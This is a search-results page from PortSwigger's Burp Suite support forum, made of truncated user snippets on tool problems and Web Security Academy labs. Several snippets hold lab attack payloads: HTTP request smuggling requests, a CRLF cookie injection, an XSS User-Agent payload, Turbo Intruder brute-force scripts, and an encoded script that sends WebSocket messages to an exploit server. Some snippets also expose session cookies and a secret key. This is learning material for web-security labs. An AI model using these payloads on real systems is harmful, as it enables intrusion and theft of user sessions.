Search Forum – PortSwigger

Browser receives "HTTP/1.0 200 Connection established" from BURP which received "HTTP/1.1 404 Not Found"

Accept-Language: en-CA,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded … ; charset=UTF-8 Content-Length: 67 Origin: https://www.XXXX.ca DNT: 1 Connection: keep-alive Referer … s_vnum=15...%3D5; AMCVS_37...%40AdobeOrg=1; check=true; wz_svgmcv_idnum=92...92_5; s_cc=true; AWSELB=67 … Accept-Language: en-CA,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded … ; charset=UTF-8 Content-Length: 67 Origin: https://www.XXXX.ca DNT: 1 Connection: close Referer:

Lab: Modifying serialized data types

Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www

%54%7a%6f%30%4f%69%4a%56%63%32%56%79%49%6a%6f%79%4f%6e%74%7a%4f%6a%67%36%49%6e%56%7a%5a%58%4a%75%59%57% … 74%39 Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 ??

this error: Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 Then, what I did is:

Modifying serialized objects" PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 echo "O:4:"User":2

HTTP Request Smuggling

The request for "Confirming TE.CL vulnerabilities using differential responses" is given as "POST /search … Content-Length: 146 x= 0 POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: … application/x-www-form-urlencoded Content-Length: 11 q=smuggling". … Content-Length: 146 x=POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application … /x-www-form-urlencoded Content-Length: 11 q=smuggling".

Unable to build http request with header

103.0.5060.134 Safari/537.36, Connection: close, Cache-Control: max-age=0, Content-Type: application/x-www-form-urlencoded … , Content-Length: 67] <type 'java.util.ArrayList'> the value is the same in updatedheader and

Modifying serialized objects

Connection: close Cookie: session=%54%7a%6f%30%4f%69%4a%56%63%32%56%79%49%6a%6f%79%4f%6e%74%7a%4f%6a%67% … this - Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4.

Scan Engine Disabled

But when updating to V2023.2 burpsuite, the scan engine is disabled.

Parameter handling

The blog posts you mention are all first page search engine results.

How do I search the support "forum"?

create new post" option but I don't really have time to read every single support request, I want to search … a similar issue to me and see what happened, I'm sure this option used to exist but now there's no search

Hi Ian, Unfortunately, we do not currently have a search function available on our forums. … Introducing a new search function for our forum, however, is currently being worked on by our website … In the meantime, whilst not being ideal, you could always try and perform your search via search engine

Discover content requests with cookies

In case someone else needs this at a later point in time and finds this via a Search Engine, just as

Request Engine

I can not see in the Intruder in the options pannel the Request Engine which enable us to change the

Hi, Intruder now uses the main Burp Task Engine (in order to bring it inline with the other Burp tools

Send request in the same connection turbo intruder

req POST / HTTP/1.1 Host: example.com Connection: keep-alive Content-Type: application/x-www-form-urlencoded … : 0 GET / HTTP/1.1 X: x Turbo intruder script def queueRequests(target, wordlists): engine

vulnerable yes or no

POST /dz588q90/xhr/api/v2/collector/beacon HTTP/1.1 Host: www.---------.com Origin: http://example.com … : */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded … Content-Length: 1410 Origin: https://www.--------.com Connection: close Referer: https://www.realself.com … /search?

Server-side pause-based request smuggling ISSUE

web-security-academy.net Cookie: session=mAbLimPqmVB5vNGU7notqlDu7ZCsW8O4 Content-Type: application/x-www-form-urlencoded … keep-alive GET /admin HTTP/1.1 Host: localhost def queueRequests(target, wordlists): engine

Academy Leaning Material minor mistake on "Finding HTTP request smuggling vulnerabilities" page.

the heading "Confirming TE.CL vulnerabilities using differential responses" reads as below: POST /search … HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length … Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

HTTP smuggling

For example i want to send this request to Confirming TE.CL vulnerabilities: POST /search HTTP/1.1 … Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding … : chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

Burp task execution engine paused

I am using the below command to start my burp pro instance. Everytime I launch it burp launches with task execution paused. Is there a way to enable it by default? command: java -jar burp.jar...

why there is an empty line after Content-Length header in http smuggle attacks?

for example : POST /search HTTP/1.1 Host: normal-website.com Content-Type: application/x-www-form-urlencoded

HTTP Request Smuggling POST Request with Body

response portion starts with a POST request without a body and then smuggles a GET request: POST /search … HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Content-Length … Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded … The HTTP Request Smuggler identifies two requests that are subject to smuggling: POST /search HTTP … For example if I want to smuggle the following request my prefix variable is set to: '''POST /search

Parameter 'search'

LABS: Reflected XSS into HTML context with all tags blocked except custom ones No parameter 'search

Lab: CSRF where token is tied to non-session cookie

Cookie: session=**************; csrfKey=************************* Content-Type: application/x-www-form-urlencoded … session=*******************; csrfKey=<<"obtained CSRF cookie HERE">> Content-Type: application/x-www-form-urlencoded … Went back to the original browser, performed a search from the wiener's page and sent the resulting request … search=hat HTTP/2 Host: LAB_ID.web-security-academy.net Cookie: session=****************; csrfKey … search=green%0d%0aSet-Cookie:%20csrfKey=YOUR-CSRF_COOKIE HTTP/2 Host: LAB_ID.web-security-academy.net

How do I tell content-discovery to give up on a certain directory tree

Hi There isn't really a way to do this from the Content Discovery engine. … However, if you go to "Settings > Search > Out-of-scope request handling", you can tell Burp to drop

Enterprise Scan Engine Update 2024.1.1.6

Hello, I can not download and install Scan Engine Update 2024.1.1.6.

Tabbed search

I would like to have a single search window and a possibility to perform multiple searches (and leave … Preferably with an option in the user options to enable or disable tabbed search.

RegEx in HTTP history search crashes burp

Recently I had an issue that my project file got corrupted after using poorly optimized RegEx in burp search … engine. … of disabling auto-regex evaluation on startup or possibly a way to add RegEx timeout that would stop search

Chaining regexes

Does regex engine in Burp support look-forward regex syntax? I can't get it to work. … =liqpw) But I'm getting 0 search results.

URL-encoded format--UTF 8

Try using the "Search" tab to search for UTF encoding.

Burpsuite v2021.10.3 freeze on launch (~30% chance of happening)

java 16.0.2 2021-07-20 Java(TM) SE Runtime Environment (build 16.0.2+7-67) Java HotSpot(TM) 64-Bit … Server VM (build 16.0.2+7-67, mixed mode, sharing) Burpsuite v2021.10.3 Edition Windows 10 Home

Control of the Intruder Engine

Does the present version of burp suite provides any API to control the Intruder engine that means using

Public post search

I can't find my old post and the search menu only let me go through all results from the beginning of

I can't find request engine

I'm learning burp suite from portswigger learning paths and i cannot find this feature.

Search among extensions

Howver, I'd deeply appreciate a Search feature in "Extender / BApp Store" (and possibly in the Web version

Search Functionality Results

Searching for a particular string with "Target, Repeater, Proxy, and Organizer" all checked under "Tools". It is not returning the requests that contain that string which have a Source of "Proxy." However, if I uncheck...

XSS DOM Based

Another great example where Burp is an information engine, more than a solution engine.

Lab: Exploiting HTTP request smuggling to perform web cache deception (Solution incorrect)

POST / HTTP/1.1 Host: xxx-your-lab-id-xxx.web-security-academy.net Content-Type: application/x-www-form-urlencoded … It was the Repeater results in the Burp Search for "POST /" that eventually returned the API Key....wierd

Getting started: Failure because Firefox 67 changes always http: to https:

Firefox 67 changes every URL from http: to https: and nothing works.

Lab: 2FA bypass using a brute-force attack

turbo intruder script def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint … requestsPerConnection=100, pipeline=False, engine

Search regex extract

I'd like to have a way to have Burp Search extract all the values that match a certain regex or results … a regex, saving the items without Base64 encoding, opening the file in Sublime, and using its regex search

search results value extraction

Would it be possible to add a grep value extractor, similar to what we have in intruder, to the overall search … I may search for all requests with a certain value, but want to be able to see that, or another value … in columns of the search window.

Turbo Intruder error

Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded … Python script (almost unchanged from examples/basic.py): def queueRequests(target, wordlists): engine

Search lacks scanner option

Hello, It would be very useful if there is a tickbox in Burp->Search.

Add time counter between Intruder requests (initiate an Intruder request every x seconds/minutes)

Look in Intruder > Options > Request Engine > Throttle

hey, there is no Request Engine here.

Filter for HTTP verbs in search

Hi guys! I was thinking that it might be useful to be able to filter searches for HTTP verbs (e.g., only POST, only GET, etc.). Thanks!

Additional Proxy History Search Filters

It would be really helpful to be able to specify proxy history searches to be limited to either requests or responses.

Search through nested values

nested insertion points for the scanner which is great but it could be very handy to be able to make search … through nested values (ex: to search a string which is encoded in base64).

Workaround for Java errors opening Burp on a secondary display on Linux

encountered this and worked through it before I could blame Burp, so I want to post about it here for search-engine

UTF-8 search not working

Could you enhance search to cover UTF-8 characters as well?

Make Search Match better for Comparer

I noticed there is a pre-defined shortcut for "Editor: Go to next search match", which is unfortunately

File search and buttons don't work

I'm currently using the latest stable version of the Windows Desktop version. For some reason, whenever I'm trying to select a wordlist in Intruder or a session file, it doesn't work and all buttons loose all...

Installer fails on linux

0x00007fc60e3e112c, pid=81701, tid=81702 # # JRE version: OpenJDK Runtime Environment (16.0.2+7) (build 16.0.2+7-67 … ) # Java VM: OpenJDK 64-Bit Server VM (16.0.2+7-67, mixed mode, tiered, compressed oops, compressed

Restrict search in responses or requests only

awesome, it would be even more awesome if it were possible, when searching for a string, to restrict the search

Bug in Search Windows using openJDK

Hello dear portswigger team, I have an issue using the Engagement Tools -> Search options. … Some times after entering the search word a suggestion window will be created as separate jwindow objects … (grey box and white box with digit 1 on the screenshot) and will not be killed after the search windows … That means that these additional windows are still open and running after closing the parent search window

N.B: i m dealing with the search window on the Repeater.

How to Search user forum posts

don't mean to sound ignorant but I've been poking around the portswigger support site and can't find a search

Search feature for named repeater tabs

In addition to that, a search feature for the tab names would be great, since it (quicly) becomes tedious … to search for a specific tab when you have 20, 30 or more tabs created.

HTML rendering engine does not use upstream proxy configuration

When using Burp alongside an upstream proxy, rendering an HTTP response inside a response object will cause burp to fetch all page resources without going through the configured proxy. This can be pretty inconvenient...

Add "Search Bapp Store" Box

How about a search box that scans the names and description files to filter down the list.

Single Page Scanning

Both products use the same scan engine.

Engagement Tools -> Search = filter by HTTP status code

Hi, Many times I'm using Search from the Engagement tools. … I know I can use searching, but if I need to search for something in the request; which results in specific

Finding all forms on a site

You do a search for a specific expression via the context menu / Engagement tools / Search.

Search field in Comparer and Order switch

Hello, It would be great to have a Searchfied in both Comparer windows and to be able switch the comparing priority between the 2 requests/responses on Comparer result window. thx

Randomize IP Header on Turbo Intruder using Engine.THREADED

I am able to randomize the header using engine=Engine.BURP but it gives me an average of 15 RPS. … But, when I use engine=Engine.THREADED, I go to more than 500 RPS. … solution on how do I generate some random values for X-Forwarded-For Header while using the THREADED engine … def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, … requestsPerConnection=50, pipeline=True, engine

Hi To clarify, your current method works fine when using the BURP engine. … However, when changing the engine to THREADED, you encounter an issue.

The debug.py example script uses the threaded engine - if you run this, does the test succeed?

Burp Extension Python Import Error

def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, … requestsPerConnection=100, pipeline=False, engine

queueRequests(target, wordlists): # to use Burp's HTTP stack for upstream proxy rules etc engine-Engine.BURP … engine = RequestEngine (endpoint-target.endpoint, concurrentConnections … pipeline=False, maxRetriesPerRequest=0, engine

Exploiting PHP deserialization with a pre-built gadget chain - getting error

Symfony Version: 4.3.6 PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www … /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7 Thanks

Lab Login Not Working

HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded … HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Force spider engine to wait for page to load (Automated spider)

the JavaScript content that's slow) Therefore I was wondering if it was possible to force the spider engine … delay between spider requests to 20 seconds, but this still leaves me with the problem that the spider engine

Missing Engagement Tools Like Search and Find Comments

I have Burp Suite Professional, but it seems like I'm missing Engagement Tools. I have Find References, Discover Content, Schedule Task, and Generate CSRF PoC. What can I do to view to remaining Engagement Tools?

HTTP request smuggling, obfuscating the TE header

POST / HTTP/1.1 Host: my host.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

intruder speed is as slow as free edition when i have professional

In Intruder -> Options -> Request Engine there are options that you can configure to fine tune the engine … options first: https://portswigger.net/burp/documentation/desktop/tools/intruder/options#request-engine

HTTP request smuggling, basic TE.CL vulnerability

i sent: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Lab: Modifying serialized data types - Debug dumps tokens

p9a5ei0x99qi74vejsq36czp0tn1z3d6, xlbjcoe8ecul6sfmtdrt5cm8qqr6o7hx]) Invalid access token for user carlos in /var/www … /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7

Upgrade from 2021_8_3 to 2021_8_4 failing

0x00007f5f570dd0cc, pid=18219, tid=18220 # # JRE version: OpenJDK Runtime Environment (16.0.2+7) (build 16.0.2+7-67 … ) # Java VM: OpenJDK 64-Bit Server VM (16.0.2+7-67, mixed mode, tiered, compressed oops, compressed

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

HTTP/1.1 Host: ac451f7f1e1dd31780a427f50095008e.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked 71 POST /admin HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

Not possible to disable "Update Content-Length"

HTTP/1.1 Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-Length: 4 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded … HTTP/1.1 Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-Length: 105 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded

HTTP Request Smuggling

portwigger: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Burp Search -> Show this Request in HTTP History

I enjoy the main Burp search functionality (Burp -> Search menu option) which allows you to look for … a particular search term within the requests/responses in the Proxy history. … I realize Proxy History's "filter by search term" can be used to accomplish something similar results … , however, it is not as powerful as the main burp search as you are not able to specify which sources … to search (Req headers, resp headers, req body, resp body, etc).

Grep all responses for a specific string

Hi Alex, One way to do this is using the Search feature (Burp menu > Search).

How do I search within multiple requests in Proxy history

The search function only works within one request but not in multiple requests ?

What are you using to search for your requests? Is it "Burp > Search"?

macOSX V11.2 Big Sur, OWASP BWA and Virtual box--Home Hacking CyberSec Lab

r140961 (Qt5.6.3) OWASP BWA = Latest available from Sourceforge, links are in the book and a quick WWW … search you'll find it.

Lab: SameSite Strict bypass via sibling domain - solution is broken

%0a%20%20%20%20%7d%3b%0a%0a%20%20%20%20%6e%65%77%57%65%62%53%6f%63%6b%65%74%2e%6f%6e%6d%65%73%73%61%67% … 66%75%6e%63%74%69%6f%6e%20%28%65%76%74%29%20%7b%0a%20%20%20%20%20%20%20%20%76%61%72%20%6d%65%73%73%61%67% … 62%2e%65%78%70%6c%6f%69%74%2d%73%65%72%76%65%72%2e%6e%65%74%2f%65%78%70%6c%6f%69%74%3f%6d%65%73%73%61%67% … 65%3d%27%20%2b%20%62%74%6f%61%28%6d%65%73%73%61%67%65%29%2c%20%7b%0a%20%20%20%20%20%20%20%20%6d%65%74%

Browser Problem

Components\DAL;C:\Program Files\Intel\Intel(R) Management Engine Components\DAL;C:\Program Files (x86 … )\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files\Intel\Intel(R) Management Engine Components … \IPT;C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\iCLS\;C:\Program Files\Intel\ … Intel(R) Management Engine Components\iCLS\;C:\Program Files\Common Files\Autodesk Shared\;C:\Program … )\Intel\Intel(R) Management Engine Components\IPT;C:\Program Files\Intel\Intel(R) Management Engine Components

Turbo Intruder with Session Handling Rules

I tried to use engine=Engine.BURP but that still didn't work. Here is my code, please help me. … ------------------CODE------------------------------- def queueRequests(target, wordlists): engine … endpoint=target.endpoint, concurrentConnections=1, engine

Can Burp Pro crawl and download the site locally?

If you go to the Burp menu and choose Search, you can set the search to look through the Request and … Response body so you can search for words or phrases across the Target, Proxy, and Repeater tools.

Even if you search with the search bar, the number of matches is not displayed and "0 highlights" is displayed.

string entered in advance in the HTTP message editor, the number of matches is not displayed in the search … Enter a search string in advance in the search bar 2. request or response is displayed 3. … (When the search hits) "0 highlights" at the bottom right of the screen glows blue for about 1 second … you enter a search string in the search bar after the request or response is displayed, the number of … in advance in the search bar.

Searching/Matching/Extracting Arabic/Hebrew Keywords isn't Working

Yes it's displaying correctly, plus search bar works as expected.

Turbo Intruder Not starting

I'm literally just stuck at "Engine warming up..."

Im still stuck at "Engine warming up..." even if i changed engine.THREADED to Engine.BURP Also yes

I'm still stuck at "Engine Warming Up.." when i try to run the "Debug.py" script

Hi Have you also tested out the debug script with both Turbo Intruder's engine and Burp's engine?

PHP deserialization: Signature does not match

receiving this error: PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www … /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7 My secret key: f99oqo0667s8noe1clqktoa99mnzvuq2

"Go" button of Engagement tools/Search box is lost

Hello, When you search long strings the "Go" button is lost after your first search. … Well not completely lost but it is moved at the right when you search for 50+ char strings.

Search function to show repeater tab name/request number

Hi, In "Burp > Search", it would be great if the search result for repeater can also show the name

ca certificate

The URL is http://burp/ - there's no www.

Burp goes into headless mode with open jdk version 1.7.0_79

java.lang.System.loadLibrary(System.java:1088) at sun.security.action.LoadLibraryAction.run(LoadLibraryAction.java:67

LAB: Exploiting HTTP request smuggling to reveal front-end request rewriting

HTTP/1.1 Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net Content-Type: application/x-www-form-urlencoded … username=carlos HTTP/1.1 X-ayZFvQ-Ip: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length

Lab : Modifying serialized data types. Bug Decoder?

The expected result should be: %54%7a%6f%30%4f%69%4a%56%63%32%56%79%49%6a%6f%79%4f%6e%74%7a%4f%6a%67% … %4f%6a%45%79%4f%69%4a%68%59%32%4e%6c%63%33%4e%66%64%47%39%72%5a%57%34%69%4f%32%6b%36%4d%44%74%39%43%67%

Burp pro as windows container

home directory as a volume and include your Burp license in the file: - https://docs.docker.com/engine … /reference/builder/#volume - https://docs.docker.com/engine/tutorials/dockervolumes/ The process

Ability to time requests?

In Burp Pro, the only scheduled task you can do is pausing and resuming the task execution engine. … also set Intruder to start an attack after a specific length of time (Intruder > Options > Request engine

MacOS 10.15.7 Install - Artemis Virus Detection

McAfee Total Protection Version 4.9.0.2 (831) Anti-malware Version 4.9.0 (100) Engine Version

How do I control (start and finish) intruder attacks in specific exact time?

burp-suite-roadmap-update-july-2020 As part of these improvements, Intruder will be linked to the task execution engine … which will then mean it will be part of the global settings for pausing/resuming the task execution engine

Search bar for "Open Existing Project" on Startup

A search function would be very appreciated there to quickly find the right project. Thank you :)

Lab 1 Directory traversal(File path traversal, simple case)

3 directory or 4 directory under root directory eg image(218.png) can we present in directory /var/www … /image/218.png or /var/www/image/abc/218.png, How we get to know this for applying Directory traversal

Lab: HTTP request smuggling, basic TE.CL vulnerability

provided is: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Filter by search terms broken when using nonascii characters

Hi, We live in Romania and when working in our native language we are also using non-ASCII characters: ăîâșț. I noticed that if I use these in a website proxied through Burp the filter does not find this characters....

Identify the template engine in the "Server-side template injection using documentation"-Lab

provoking a syntax/undefined variable error, because the error message gives a hint to the used template engine

Bug in Lab

error Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4

HTTP request

POST / HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

How do I Import Binary Search Code into BurpSuite? The Elegant Solution(Binary Search) of -> Lab: Blind SQL injection with conditional responses

lab-conditional-responses There is a note on this lab about a more elegant solution, which is to perform binary search … I did this manually( in my head), but is it possible to import the binary search code into BurpSuite

Burp Intruder inaccurate received and completed response time

I think setting the "Number of threads" to 1 in "Intruder >> Options >> Request Engine" section may solve

Is that possible to create a Docker image of Burp Pro?

home directory as a volume and include your Burp license in the file: - https://docs.docker.com/engine … /reference/builder/#volume - https://docs.docker.com/engine/tutorials/dockervolumes/ You can load

Status "Errors: Unknown"

During our first scan, the crawl phase finishes with 6000+ requests and 67 locations scanned.

Lab: HTTP request smuggling, basic TE.CL vulnerability

Please see below: POST / HTTP/1.1 Host: <lab-ID>.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: 0a4200c60375b196c058f06300d100b9.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: 0a55001804a184ac82e056fd001300f2.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-length: 4 Transfer-Encoding: chunked 5c GPOST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Lab Not Working Properly

HTTP/1.1 Host: ac821ff91fa6a6ac80911ed1005d00ec.web-security-academy.net Content-Type: application/x-www-form-urlencoded … 1.1 Host: aca71f681fe0a61c80c01e0d01930066.web-security-academy.net Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: acaf1f911ef7cfe6801f0c0400ef00b5.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Host: exploit-ace11f511e3acff980030cc4010500fe.web-security-academy.net Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: ac7a1f911ef7995e80d3ec5300020083.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Host: exploit-acab1f4f1e8899f38092ec9101ef005c.web-security-academy.net Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: acfb1ff41fc0eb70c03ba87e008c000d.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Host: exploit-ac6a1f321fcaeb3dc0f4a8cc013d002c.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Exploiting HTTP request smuggling to perform web cache poisoning - Not getting results.

HTTP/1.1 Host: acfb1ff41fc0eb70c03ba87e008c000d.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Host: exploit-ac6a1f321fcaeb3dc0f4a8cc013d002c.web-security-academy.net Content-Type: application/x-www-form-urlencoded

Lab: Arbitrary object injection in PHP

burp request ..Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:5 Stack trace: #0 {main} thrown in /var/www/index.php on line 5

Missing parameter in HTTP Smuggling request lab

HTTP/1.1 Host: 0a3a008503e2d7a7c03e1b91006c0030.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-Length: 256 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: 0abd00da04a3b710c0c4a56b002200b3.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-Length: 256 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Lab Not Responding

HTTP/1.1 Host: ac6d1fc91e74b3a4808926fc009c005a.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Lab: Exploiting HTTP request smuggling to capture other users' requests

the lab POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-Length: 256 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Lab: Exploiting HTTP request smuggling to capture other users' requests-- not solving

HTTP/1.1 Host: ac4f1f451ed62abd80777fe600120062.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-Length: 277 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

HTTP request smuggling, obfuscating the TE header

response when i sent this request POST / HTTP/1.1 Host: my lab id Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Sort entries in the site map by domain components before hostname

com.host1.www com.host1.www1 com.net2.www even though the hostnames are actually displayed as expected

Allow to search for support/forum issue using keyword

In the past I used to search on support related issues on https://portswigger.net/support or https:/ … Apparently today - I don't find the search text box. … Can this (search) functionality added again? Thanks, Vinay

HTTP request smuggling, basic TE.CL vulnerability Lab Queries.

AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36 Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked Connection: keep-alive 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Exploiting HTTP request smuggling to capture other users' requests

acc91f4d1faf6485c0b70322000b009b.web-security-academy.net Cookie: session=bWpx0z3BW0qJhvBVGo9kof3BBkwpv3qU Content-Type: application/x-www-form-urlencoded … Transfer-encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Length: 600 Content-Type: application/x-www-form-urlencoded

Java Error Occured during Pentesting on .jsp webpage

In Scanner > Options > Active Scanning Engine. … There is a similar setting in Spider > Options > Spider Engine.

Different URLs in Target: Request, Raw and Site map URL

Here is what is shown in the Site map window right above (list of all URLs): https://www. … id=WEB87431-20150616190 HTTP/1.1 Same with: https://www._something_ com/ - GET - /bp_chart.php?

invisible proxy

Technical_notes/Add_a_second_IP_address_to_an_existing_network_adapter_on_Windows and "Linux":https://www

LAB: Exploiting HTTP request smuggling to perform web cache poisoning

I'll past the request: POST / HTTP/1.1 Host: victimhost Content-Type: application/x-www-form-urlencoded … postId=1 HTTP/1.1 Host: exploitserver Content-Type: application/x-www-form-urlencoded Content-Length

Turbo Intruder - race-single-packet-attack.py Not queueing requests

Also, Tried this on http2 server using Engine.BURP2 but I'm getting: AttributeError: class Engine

Lab Issues: Exploiting HTTP request smuggling to deliver reflected XSS

Exploit: ``` POST / HTTP/1.1 Host: my-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded … postId=5 HTTP/1.1 User-Agent: a"/><script>alert(1)</script> Content-Type: application/x-www-form-urlencoded

Request Smuggling - Lab does not work

0a5900b7040dfb4fc1db8f1c005d0093.web-security-academy.net Connection: keep-alive Content-Type: application/x-www-form-urlencoded

HTTP/2 Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net Content-Type: application/x-www-form-urlencoded … HTTP/2 Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net Content-Type: application/x-www-form-urlencoded

HTTP/1.1 Host: 0ac800a704bbd7328148caab006b0005.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Run Intruder attack in silent mode

You could also try to configure the settings within Intruder -> Options -> Request Engine. … you can alter: https://portswigger.net/burp/documentation/desktop/tools/intruder/options#request-engine

Training Burp's crawler

Ensure the task execution engine isn't paused.

Lab: 2FA bypass using a brute-force attack

this is my turbo code : def queueRequests(target, wordlists): engine = RequestEngine(endpoint … =target.endpoint, concurrentConnections=5, engine

Parameter payloads that are required to launch a scan using burp API

Hey Uthman, Thanks for connecting, so we are implementing a local orchestration engine which will

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

HTTP/1.1 Host: aca11fb21f25e1e3803a19b400f90012.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-length: 4 Transfer-Encoding: chunked 60 POST /admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded … POST /admin HTTP/1.1 -> 20 characters + 2 ending \r\n (22 characters) Content-Type: application/x-www-form-urlencoded

Lab - Modifying serialized objects login fuction not working properly?

